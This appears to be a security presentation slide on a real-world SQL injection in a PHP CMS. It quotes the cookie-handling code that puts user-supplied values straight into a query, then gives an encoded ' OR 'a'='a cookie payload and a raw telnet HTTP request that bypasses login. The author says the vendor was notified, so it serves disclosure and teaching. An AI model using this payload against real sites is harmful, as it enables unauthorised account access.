Attack ALert :: Magic Quotes :: Real World

Attack ALert :: Magic Quotes :: Real World

23.cf5dfc3f4e21fa3d1b0af26c9e72dffd
  1. // line: 1026 - init_session () [trimmed]
  2.   list($uid, $upw)=explode(".", $_COOKIE[$pref['cookie_name']]);
  3. // line 1039
  4.   if($result = get_user_data($uid, "AND md5(u.user_password)='{$upw}'", FALSE)) {
  5. // line: 783 - get_user_data ($uid, $extra, $force_join)
  6.   $qry = "SELECT * FROM #user AS u WHERE u.user_id='{$uid}' {$extra}";
  7. // file: class2.php line: 785 - get_user_data ()
  8.   if ($sql->db_Select_gen($qry))
  1. 1.%27%20OR%20%27a%27%20=%20%27a
  1. AND md5(u.user_password)='' OR 'a' = 'a'
telnet host.net 80
GET /page.php HTTP/1.1
Host: host.net
Cookie: cookie=1.%27%20OR%20%27a%27%20=%20%27a


BTW: I have made the CMS vendor aware of this, and asked permission to talk about this vulnerability in this presentation.